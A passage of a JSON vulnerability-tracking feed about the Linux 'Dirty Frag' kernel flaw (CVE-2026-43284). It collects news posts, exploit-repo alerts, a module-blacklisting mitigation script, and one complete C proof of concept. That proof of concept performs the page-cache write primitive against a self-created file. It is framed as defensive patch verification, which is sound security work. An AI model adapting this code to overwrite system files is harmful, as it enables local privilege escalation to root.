Live-patch, micro-patch, pipelines acc\u00e9l\u00e9r\u00e9s... \u00e0 suivre.\n#CyberVeille", "creation_timestamp": "2026-05-09T10:27:16.833081Z"}, {"uuid": "0ec5b47b-b92b-413b-8cba-8ab60c57389a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/ostechnix.bsky.social/post/3mlg7ub7k7s2m", "content": "Fedora pushed kernel 7.0.4 to stable to fix the Dirty Frag and Copy Fail 2 vulnerabilities. Both CVE-2026-43284 and CVE-2026-43500 Patched.\n\nFull details here: ostechnix.com/fedora-44-ke... \n\n#Fedora44 #Linuxkernel704 #DirtyFrag #CopyFail2 #CVE_2026_43284 #CVE_2026_43500", "creation_timestamp": "2026-05-09T12:14:33.639060Z"}, {"uuid": "ce2da3b7-c9c0-4818-8d84-229cd6656c85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7xouqjr2s", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:24.358334Z"}, {"uuid": "177b5eb0-07b5-4c4a-803c-ee7babf337f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yapvym27", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:42.459603Z"}, {"uuid": "f51d5389-5b0c-47de-a143-9dac2ba38a42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/lu1tr0n.bsky.social/post/3mlg7yr5bje27", "content": "Dirty Frag (CVE-2026-43284 y CVE-2026-43500): xfrm-ESP y RxRPC, los page-cache write primitives detr\u00e1s del nuevo LPE de mayo\n\n\nhttps://elsolitario.org/2026/05/09/dirty-frag-cve-2026-43284-y-cve-2026-43500-xfrm-esp-y-rxrpc-los-page-cache-write/?utm_source=bluesky&utm_medium=social&utm_campaign=pro...", "creation_timestamp": "2026-05-09T12:16:59.265423Z"}, {"uuid": "7ef57213-951a-4cba-b7c6-0000b3fe8e8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/artem-panchenko/0fab615ba3e9a7b471b659bef4472281", "content": "// Minimal Dirty Frag (CVE-2026-43284 / xfrm-ESP) PoC against a self-owned file.\n//\n// Authorized defensive testing only. Targets /tmp/target.bin (created by this\n// program) \u2014 never touches /usr/bin/su, /etc/passwd, or any system file.\n//\n// What it does:\n//   1. Create /tmp/target.bin with 4096 'A' bytes; fsync to disk.\n//   2. Read it once to prime the page cache with 'A'.\n//   3. Fork. In the child:\n//        unshare(NEWUSER|NEWNET) -> map uid/gid -> ifup lo\n//        register one XFRM SA with ESN flag and seq_hi = 0x42424242 (\"BBBB\")\n//        send a forged ESP packet over loopback whose frag is the page cache\n//        page of /tmp/target.bin via splice() with MSG_SPLICE_PAGES\n//        kernel hits the vulnerable skip_cow branch in esp_input(), runs\n//        in-place AEAD on top of the frag, and the 4-byte sequence-number\n//        rearrangement STOREs seq_hi onto page_address(target_page) +\n//        assoclen+cryptlen.  AEAD auth fails with -EBADMSG but the STORE\n//        already happened.\n//   4. Parent verifies: cached read should return \"BBBB\" at offset 0; an\n//      O_DIRECT read should still return \"AAAA\" (disk unchanged).\n//\n// On a patched kernel (>= mainline 2026-05-08 commit f4c50a4034e6) the trigger\n// runs cleanly but the bytes don't change \u2014 also useful: confirms the patch\n// landed on this node.\n//\n// Build:\n//   gcc -O0 -Wall -o /tmp/dirtyfrag_min dirtyfrag_min.c\n//\n// Run:\n//   /tmp/dirtyfrag_min\n// Then in the Streamlit app, point the multi-method reader at /tmp/target.bin.\n// Cached should show 'B' at byte 0; O_DIRECT should show 'A'.\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef UDP_ENCAP\n#define UDP_ENCAP 100\n#endif\n#ifndef UDP_ENCAP_ESPINUDP\n#define UDP_ENCAP_ESPINUDP 2\n#endif\n\n#define PAGE        4096\n#define ENC_PORT    4500\n#define SEQ_VAL     200\n#define REPLAY_SEQ  100\n#define TARGET      \"/tmp/target.bin\"\n#define SPI_VAL     0xDEADBE10u\n#define PATCH_OFF   0                  // file offset of the 4-byte STORE\n#define PATCH_SEQHI 0x42424242u        // 4 bytes to plant: \"BBBB\"\n\nstatic int write_proc(const char *path, const char *buf) {\n    int fd = open(path, O_WRONLY);\n    if (fd < 0) return -1;\n    int n = write(fd, buf, strlen(buf));\n    close(fd);\n    return n;\n}\n\nstatic int setup_userns_netns(void) {\n    uid_t uid = getuid();\n    gid_t gid = getgid();\n    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {\n        fprintf(stderr, \"unshare: %s\\n\", strerror(errno));\n        return -1;\n    }\n    write_proc(\"/proc/self/setgroups\", \"deny\");\n    char map[64];\n    snprintf(map, sizeof(map), \"0 %u 1\", uid);\n    if (write_proc(\"/proc/self/uid_map\", map) < 0) return -1;\n    snprintf(map, sizeof(map), \"0 %u 1\", gid);\n    if (write_proc(\"/proc/self/gid_map\", map) < 0) return -1;\n\n    int s = socket(AF_INET, SOCK_DGRAM, 0);\n    if (s < 0) return -1;\n    struct ifreq ifr;\n    memset(&ifr, 0, sizeof(ifr));\n    strncpy(ifr.ifr_name, \"lo\", IFNAMSIZ - 1);\n    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { close(s); return -1; }\n    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;\n    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { close(s); return -1; }\n    close(s);\n    return 0;\n}\n\nstatic void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len) {\n    struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));\n    rta->rta_type = type;\n    rta->rta_len  = RTA_LENGTH(len);\n    memcpy(RTA_DATA(rta), data, len);\n    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);\n}\n\nstatic int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi) {\n    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);\n    if (sk < 0) return -1;\n    struct sockaddr_nl nl = { .nl_family = AF_NETLINK };\n    if (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) { close(sk); return -1; }\n\n    char buf[4096] = {0};\n    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;\n    nlh->nlmsg_type  = XFRM_MSG_NEWSA;\n    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;\n    nlh->nlmsg_pid   = getpid();\n    nlh->nlmsg_seq   = 1;\n    nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));\n\n    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);\n    xs->id.daddr.a4   = inet_addr(\"127.0.0.1\");\n    xs->id.spi        = htonl(spi);\n    xs->id.proto      = IPPROTO_ESP;\n    xs->saddr.a4      = inet_addr(\"127.0.0.1\");\n    xs->family        = AF_INET;\n    xs->mode          = XFRM_MODE_TRANSPORT;\n    xs->replay_window = 0;\n    xs->reqid         = 0x1234;\n    xs->flags         = XFRM_STATE_ESN;\n    xs->lft.soft_byte_limit   = (uint64_t)-1;\n    xs->lft.hard_byte_limit   = (uint64_t)-1;\n    xs->lft.soft_packet_limit = (uint64_t)-1;\n    xs->lft.hard_packet_limit = (uint64_t)-1;\n    xs->sel.family       = AF_INET;\n    xs->sel.prefixlen_d  = 32;\n    xs->sel.prefixlen_s  = 32;\n    xs->sel.daddr.a4     = inet_addr(\"127.0.0.1\");\n    xs->sel.saddr.a4     = inet_addr(\"127.0.0.1\");\n\n    {\n        char ab[sizeof(struct xfrm_algo_auth) + 32] = {0};\n        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)ab;\n        strncpy(aa->alg_name, \"hmac(sha256)\", sizeof(aa->alg_name) - 1);\n        aa->alg_key_len   = 32 * 8;\n        aa->alg_trunc_len = 128;\n        memset(aa->alg_key, 0xAA, 32);\n        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, ab, sizeof(ab));\n    }\n    {\n        char eb[sizeof(struct xfrm_algo) + 16] = {0};\n        struct xfrm_algo *ea = (struct xfrm_algo *)eb;\n        strncpy(ea->alg_name, \"cbc(aes)\", sizeof(ea->alg_name) - 1);\n        ea->alg_key_len = 16 * 8;\n        memset(ea->alg_key, 0xBB, 16);\n        put_attr(nlh, XFRMA_ALG_CRYPT, eb, sizeof(eb));\n    }\n    {\n        struct xfrm_encap_tmpl enc = {0};\n        enc.encap_type  = UDP_ENCAP_ESPINUDP;\n        enc.encap_sport = htons(ENC_PORT);\n        enc.encap_dport = htons(ENC_PORT);\n        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));\n    }\n    {\n        char esnb[sizeof(struct xfrm_replay_state_esn) + 4] = {0};\n        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esnb;\n        esn->bmp_len       = 1;\n        esn->seq           = REPLAY_SEQ;\n        esn->seq_hi        = patch_seqhi;\n        esn->replay_window = 32;\n        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esnb, sizeof(esnb));\n    }\n\n    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }\n    char rb[4096];\n    int n = recv(sk, rb, sizeof(rb), 0);\n    close(sk);\n    if (n < 0) return -1;\n    struct nlmsghdr *rh = (struct nlmsghdr *)rb;\n    if (rh->nlmsg_type == NLMSG_ERROR) {\n        struct nlmsgerr *e = NLMSG_DATA(rh);\n        if (e->error) {\n            fprintf(stderr, \"xfrm NEWSA error: %s\\n\", strerror(-e->error));\n            return -1;\n        }\n    }\n    return 0;\n}\n\nstatic int do_one_write(const char *path, off_t offset, uint32_t spi) {\n    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);\n    if (sk_recv < 0) return -1;\n    int one = 1;\n    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));\n    struct sockaddr_in sa = {\n        .sin_family = AF_INET,\n        .sin_port   = htons(ENC_PORT),\n        .sin_addr   = { inet_addr(\"127.0.0.1\") },\n    };\n    if (bind(sk_recv, (struct sockaddr *)&sa, sizeof(sa)) < 0) { close(sk_recv); return -1; }\n    int encap = UDP_ENCAP_ESPINUDP;\n    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {\n        close(sk_recv); return -1;\n    }\n    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);\n    if (sk_send < 0) { close(sk_recv); return -1; }\n    if (connect(sk_send, (struct sockaddr *)&sa, sizeof(sa)) < 0) {\n        close(sk_send); close(sk_recv); return -1;\n    }\n    int file_fd = open(path, O_RDONLY);\n    if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }\n    int pfd[2];\n    if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }\n\n    uint8_t hdr[24];\n    *(uint32_t *)(hdr + 0) = htonl(spi);\n    *(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);\n    memset(hdr + 8, 0xCC, 16);\n\n    struct iovec iov = { .iov_base = hdr, .iov_len = sizeof(hdr) };\n    if (vmsplice(pfd[1], &iov, 1, 0) != (ssize_t)sizeof(hdr)) goto fail;\n    off_t off = offset;\n    if (splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16) goto fail;\n    splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);\n    usleep(150 * 1000);  // give kernel time to process the encap'd ESP\n\n    close(file_fd); close(pfd[0]); close(pfd[1]);\n    close(sk_send); close(sk_recv);\n    return 0;\nfail:\n    close(file_fd); close(pfd[0]); close(pfd[1]);\n    close(sk_send); close(sk_recv);\n    return -1;\n}\n\nstatic int prepare_target(void) {\n    unsigned char *a;\n    if (posix_memalign((void **)&a, PAGE, PAGE)) return -1;\n    memset(a, 'A', PAGE);\n    int fd = open(TARGET, O_RDWR | O_CREAT | O_TRUNC, 0644);\n    if (fd < 0) { free(a); return -1; }\n    if (write(fd, a, PAGE) != PAGE) { close(fd); free(a); return -1; }\n    fsync(fd);\n    close(fd);\n    // Prime the page cache.\n    fd = open(TARGET, O_RDONLY);\n    read(fd, a, PAGE);\n    close(fd);\n    free(a);\n    return 0;\n}\n\nstatic void verify(void) {\n    unsigned char buf[16];\n    int fd = open(TARGET, O_RDONLY);\n    if (fd < 0) { perror(\"verify open\"); return; }\n    if (read(fd, buf, 16) != 16) { perror(\"verify read\"); close(fd); return; }\n    close(fd);\n    printf(\"\\nFirst 16 bytes via cached read: \");\n    for (int i = 0; i < 16; i++) printf(\"%02x \", buf[i]);\n    putchar('\\n');\n    int landed = (buf[0] == 0x42 && buf[1] == 0x42 && buf[2] == 0x42 && buf[3] == 0x42);\n    printf(\"Bytes 0..3 = %s\\n\", landed ? \"BBBB  --  STORE LANDED\" : \"AAAA  --  no change\");\n    if (!landed) {\n        printf(\"Possible reasons: kernel patched (CVE-2026-43284 fix landed),\\n\"\n               \"  esp4 module not loaded, SA registration silently failed,\\n\"\n               \"  or the page-cache page was evicted between prime and trigger.\\n\");\n    } else {\n        printf(\"\\nNow run the Streamlit multi-method reader on %s --\\n\"\n               \"  cached read should show 'BBBB' (0x42*4) at bytes 0..3,\\n\"\n               \"  O_DIRECT read should still show 'AAAA' (0x41*4) at bytes 0..3.\\n\"\n               \"  That divergence IS the page cache write.\\n\", TARGET);\n    }\n}\n\nint main(void) {\n    if (prepare_target() < 0) {\n        fprintf(stderr, \"prepare_target: %s\\n\", strerror(errno));\n        return 1;\n    }\n    printf(\"[+] target %s ready (4096 'A' bytes, primed in cache)\\n\", TARGET);\n\n    pid_t pid = fork();\n    if (pid < 0) { perror(\"fork\"); return 1; }\n    if (pid == 0) {\n        if (setup_userns_netns() < 0) _exit(2);\n        if (add_xfrm_sa(SPI_VAL, PATCH_SEQHI) < 0) _exit(3);\n        if (do_one_write(TARGET, PATCH_OFF, SPI_VAL) < 0) _exit(4);\n        _exit(0);\n    }\n    int st;\n    waitpid(pid, &st, 0);\n    if (!WIFEXITED(st)) {\n        fprintf(stderr, \"child died abnormally\\n\");\n        return 1;\n    }\n    int rc = WEXITSTATUS(st);\n    printf(\"[+] child exited with %d\\n\", rc);\n    if (rc != 0) {\n        const char *step[] = {\n            \"ok\", \"prep\", \"userns/netns setup\", \"xfrm SA registration\", \"splice trigger\"\n        };\n        if (rc >= 1 && rc <= 4) {\n            printf(\"    failed step: %s\\n\", step[rc]);\n        }\n    }\n    verify();\n    return 0;\n}", "creation_timestamp": "2026-05-09T17:43:07.000000Z"}, {"uuid": "5b9b1c13-921f-45a8-84ba-7fdbfc866f88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mlgkaaqqmx2m", "content": "Linux Kernel\u306eLPE(Local Privilege Escalation)\u8106\u5f31\u6027(Dirty Frag: CVE-2026-43284, CVE-2026-43500) - SIOS SECURITY BLOG\nhttps://security.sios.jp/vulnerability/kernel-security-vulnerability-20260508/", "creation_timestamp": "2026-05-09T15:20:08.661492Z"}, {"uuid": "a918c1a1-b7ad-40c8-b8c6-a32db7af0bc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83525", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a dirty-frag-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a haydenjames\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 14:58:13\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRead-only checker for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) Linux kernel local-root vulns\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T15:00:04.000000Z"}, {"uuid": "79037708-2e88-492e-80bf-3d902cb5b67c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlgnguaqpx52", "content": "CVE-2026-43284 (\"Dirty Frag\") Alma Linux Article URL: https://almalinux.org/blog/2026-05-07-dirty-frag/ Comments URL: https://news.ycombinator.com/item?id=48075868 Points: 2 # Comments: 0\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-09T16:17:36.525521Z"}, {"uuid": "7618e236-a67a-4172-99f5-e984a0838d89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlgwwm4ucgp2", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days Article URL: https://www.copahost.com/blog/dirty-frag-cve-2026-43284/ Comments URL: https://news.ycombinator.com/i...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-09T19:07:29.030802Z"}, {"uuid": "779be413-80c3-47b9-8e07-0118abcadddf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlgye5w3gt32", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days Article URL: https://www.copahost.com/blog/dirty-frag-cve-2026-43284/ Comments URL: https://news.ycombinator.com/i...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-09T19:34:23.897310Z"}, {"uuid": "bce029af-99e0-4f45-a58e-16fdc83f4da0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlgzuvenwp2t", "content": "\ud83d\udfe0 CVE-2026-43284 - High (7.8)\n\nIn the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: esp: avoid in-place de...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-43284/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-09T20:00:07.667920Z"}, {"uuid": "a1bbeaff-f796-4fcc-80b9-e260251bdd79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mlh2f4thae2t", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days\ncomments \u00b7 posted on 2026.05.09 at 14:59:49 (c=0, p=3)", "creation_timestamp": "2026-05-09T20:09:12.471557Z"}, {"uuid": "47fcc3a3-c4e0-4cb8-a778-ae92a1618b0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3mlh2gpti2i2t", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days\n\nDiscussion", "creation_timestamp": "2026-05-09T20:10:07.078288Z"}, {"uuid": "957700e3-4bf5-4243-a863-657cbefb13d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mlh2ie35o32w", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days\nDiscussion | hackernews | Author: ggallas", "creation_timestamp": "2026-05-09T20:10:59.807201Z"}, {"uuid": "bca669b9-3200-49ac-a478-2910535726f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mlh3l5bdxc2l", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days\n\nhttps://www.copahost.com/blog/dirty-frag-cve-2026-43284/", "creation_timestamp": "2026-05-09T20:30:27.387739Z"}, {"uuid": "73249420-2ba1-445d-8277-d7dba2224e8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/aibottel.bsky.social/post/3mlh46qzo3223", "content": "\u201cDirty Frag\u201d (CVE-2026-43284) \u2013 Second Linux root exploit in eight days \u2013 patch your server\u00a0now\n\nEight days after Copy Fail shook the Linux server world, another critical vulnerability has arrived, and this one also grants root access to anyone who can run code on your server. is called \u201cDirty\u2026", "creation_timestamp": "2026-05-09T20:41:25.440255Z"}, {"uuid": "c1d9e3e9-b591-42b0-8d67-44d9c6748cc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/bottiger1/83d95b500a135a7283504995082a87dd", "content": "#!/usr/bin/env bash\n# CVE-2026-31431 (Copy Fail) | CVE-2026-43284 / CVE-2026-43500 (Dirty Frag)\nset -euo pipefail\n\nRED='\\033[0;31m'; YEL='\\033[1;33m'; GRN='\\033[0;32m'; NC='\\033[0m'\nok()   { echo -e \"  [${GRN}OK${NC}]   $*\"; }\nwarn() { echo -e \"  [${YEL}WARN${NC}] $*\"; }\nerr()  { echo -e \"  [${RED}FAIL${NC}] $*\"; }\n\nCONF=\"/etc/modprobe.d/dirtyfrag.conf\"\nMODS=(algif_aead esp4 esp6 rxrpc)\n\n[[ $EUID -eq 0 ]] || { err \"Run as root\"; exit 1; }\n\nprintf 'install %s /bin/false\\n' \"${MODS[@]}\" > \"$CONF\"\nok \"Wrote $CONF\"\n\nfor mod in \"${MODS[@]}\"; do\n    if lsmod | grep -q \"^${mod} \"; then\n        rmmod \"$mod\" 2>/dev/null && ok \"Unloaded $mod\" || warn \"Could not unload $mod \u2014 reboot needed\"\n    else\n        ok \"Not loaded: $mod\"\n    fi\ndone\n\necho -e \"\\nVerification:\"\nall_ok=true\nfor mod in \"${MODS[@]}\"; do\n    grep -q \"install ${mod} /bin/false\" \"$CONF\" 2>/dev/null \\\n        && ok \"Blocked: $mod\" || { err \"Rule missing: $mod\"; all_ok=false; }\n    lsmod | grep -q \"^${mod} \" \\\n        && { warn \"Still loaded: $mod \u2014 reboot required\"; all_ok=false; }\ndone\n\n$all_ok && echo -e \"\\n${GRN}\u2714 Done.${NC}\" || echo -e \"\\n${YEL}\u26a0 Reboot to complete.${NC}\"", "creation_timestamp": "2026-05-09T20:54:35.000000Z"}, {"uuid": "c3188d1f-be42-4479-b36e-dabf713c06d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mlijoq3ck42w", "content": "Dirty Frag: New Linux Page-Cache Local PrivEsc Chain (CVE-2026-43284 & CVE-2026-43500) \u2013 Full Distro Coverage +\u00a0Video\n\nIntroduction: The Linux kernel\u2019s page cache \u2013 a core performance feature that caches filesystem data in memory \u2013 has become the latest attack surface for local privilege\u2026", "creation_timestamp": "2026-05-10T10:15:39.816274Z"}, {"uuid": "7c096e66-6e45-486d-b74a-0712a2030d29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/shortinfo.bsky.social/post/3mlitjang6426", "content": "Two newly disclosed Linux kernel flaws named Dirty Frag (CVE-2026-43284 and CVE-2026-43500) can be chained into a single command that grants any user root. Microsoft confirmed active exploitation. One patch is out, the other is pending. Ubuntu, Red Hat and Fedora are affected.", "creation_timestamp": "2026-05-10T13:11:34.926225Z"}, {"uuid": "940d4cfb-3676-4c2a-aa9d-e964d7bfa6e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83567", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a dirtyfrag-arm64\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a linnemanlabs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 22:58:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\narm64/aarch64 port of V4bel/dirtyfrag (CVE-2026-43284). ESP-only - rxrpc path kernel-oopses on arm64 due to flush_dcache_page\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-09T23:00:04.000000Z"}, {"uuid": "fff7b612-b190-49b7-a068-b2d61ae39177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://t.me/GithubRedTeam/83571", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DIRTY-FRAG-Detection-with-Wazuh-4.14.4\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a mym0us3r\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-09 23:58:50\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nWazuh 4.14.4 detection rules for CVE-2026-43284 / CVE-2026-43500 (Dirty Frag) - Linux Local Privilege Escalation via page cache write\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-10T00:00:04.000000Z"}, {"uuid": "d85537bb-f08e-4751-93d8-d931e45c55fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 